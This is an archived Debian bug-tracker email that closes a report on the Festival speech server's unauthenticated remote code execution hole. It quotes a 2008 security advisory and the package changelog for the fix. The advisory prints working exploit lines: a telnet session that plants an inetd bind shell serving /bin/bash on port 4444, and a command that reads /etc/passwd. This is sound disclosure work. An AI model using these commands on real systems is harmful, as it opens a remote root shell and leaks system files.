Your message dated Tue, 19 Feb 2008 08:47:08 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#466146: fixed in festival 1.96~beta-6
has caused the Debian Bug report #466146,
regarding festival: Default configuration allows unauthenticated remote code
execution
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
466146: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=466146
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: festival
Version: 1.96~beta-5
Severity: critical
Tags: security
Justification: root security hole
Nth Dimension Security Advisory (NDSA20080215)
Date: 15th February 2008
Author: Tim Brown <mailto:[EMAIL PROTECTED]>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: Festival 1.96:beta July 2004
<http://www.cstr.ed.ac.uk/projects/festival.html>
Vendor: Centre for Speech Technology Research, University of Edinburgh
<http://www.cstr.ed.ac.uk/>
Risk: Medium
Summary
The Festival server is vulnerable to unauthenticated remote code execution.
Further research indicates that this vulnerability has already been reported
as a local privilege escalation against both the Gentoo and SuSE GNU/Linux
distributions. The remote form of this vulnerability was identified in
1.96~beta-5 as distributed in Debian unstable.
Technical Details
The Festival server which can be started using festival --server is vulnerable
to unauthenticated remote command execution due to the inclusion of a scheme
interpreter. It is possible to make use of standard scheme functions in order
to execute further code, like so:
$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo '4444 stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")
Connection closed by foreign host.
Whilst this is the most trivial way that the vulnerability can be exploited
the inclusion of a scheme interpreter available without authentication allows
for other vectors of attack. Scheme functions such as SayText and tts (which
reads a file on the vulnerable system) pose particular interest, for example:
$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)
Whilst it is acknowledged that the inclusion of the scheme interpreter in this
manner is entirely intentional, the default unsecure state of the server could
be exploited particularly where the user is unaware of the servers existance.
Solutions
In order to completely protect against the vulnerability (in the short term),
Nth Dimension recommend turning off the server or filtering connections to the
affected port using a host based firewall. The server itself can be secured by
applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477.
This includes applying a default configuration which limits access to localhost
and setting an optional password which prevents unauthenticated access.
-- System Information:
Debian Release: lenny/sid
APT prefers oldstable
APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500,
'stable'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages festival depends on:
ii adduser 3.105 add and remove users and groups
ii libaudiofile0 0.2.6-7 Open-source version of SGI's audio
ii libc6 2.7-8 GNU C Library: Shared libraries
ii libesd0 0.2.36-3 Enlightened Sound Daemon - Shared
ii libestools1.2 1:1.2.96~beta-2 Edinburgh Speech Tools Library
ii libgcc1 1:4.3-20080202-1 GCC support library
ii libncurses5 5.6+20080203-1 Shared libraries for terminal hand
ii libstdc++6 4.3-20080202-1 The GNU Standard C++ Library v3
ii lsb-base 3.1-24 Linux Standard Base 3.1 init scrip
ii sgml-base 1.26 SGML infrastructure and SGML catal
ii sysv-rc 2.86.ds1-53 System-V-like runlevel change mech
Versions of packages festival recommends:
ii festvox-kallpc16k [festival-v 1.4.0-5 American English male speaker for
-- no debconf information
--- End Message ---
--- Begin Message ---
Source: festival
Source-Version: 1.96~beta-6
We believe that the bug you reported is fixed in the latest version of
festival, which is due to be installed in the Debian FTP archive:
festival-dev_1.96~beta-6_i386.deb
to pool/main/f/festival/festival-dev_1.96~beta-6_i386.deb
festival_1.96~beta-6.diff.gz
to pool/main/f/festival/festival_1.96~beta-6.diff.gz
festival_1.96~beta-6.dsc
to pool/main/f/festival/festival_1.96~beta-6.dsc
festival_1.96~beta-6_i386.deb
to pool/main/f/festival/festival_1.96~beta-6_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Kumar Appaiah <[EMAIL PROTECTED]> (supplier of updated festival package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Sun, 17 Feb 2008 06:45:30 +0530
Source: festival
Binary: festival festival-dev
Architecture: source i386
Version: 1.96~beta-6
Distribution: unstable
Urgency: high
Maintainer: Kartik Mistry <[EMAIL PROTECTED]>
Changed-By: Kumar Appaiah <[EMAIL PROTECTED]>
Description:
festival - General multi-lingual speech synthesis system
festival-dev - Development kit for the Festival speech synthesis system
Closes: 466146
Changes:
festival (1.96~beta-6) unstable; urgency=high
.
* Fix root security hole. Thanks to Tim Brown.
+ debian/festival.init: Read festival.scm upon start.
(Closes: #466146)
* debian/control:
+ Remove Debian revision from speech-tools dependency.
* debian/festival.scm:
+ Add sane default values for server. The festival
init script now uses these values while starting the
server.
* debian/README.Debian:
+ Document some changes on daemon mode.
* debian/templates, debian/config, debian/festival.postinst:
+ Ask for server password during install.
* debian/lintian-override:
+ Permission of /etc/festival.scm should be 0600.
Files:
87ae351a367fd584bd752f64e52e05f4 992 sound optional festival_1.96~beta-6.dsc
03128dd3c341e56350b7ad9427cfce84 70317 sound optional
festival_1.96~beta-6.diff.gz
b4c9a5379d229eb83a8950c3bcefe495 914856 sound optional
festival_1.96~beta-6_i386.deb
c407b06464a5aa0a53bdec9a7729a148 695604 libdevel optional
festival-dev_1.96~beta-6_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFHuomP2kYOR+5txmoRAindAJ9sV6p8AaYW55wr2d9KNVtmx5LkvgCeLVeD
H2mr8oAxdTSkUraRlAbNdMQ=
=SMYE
-----END PGP SIGNATURE-----
--- End Message ---
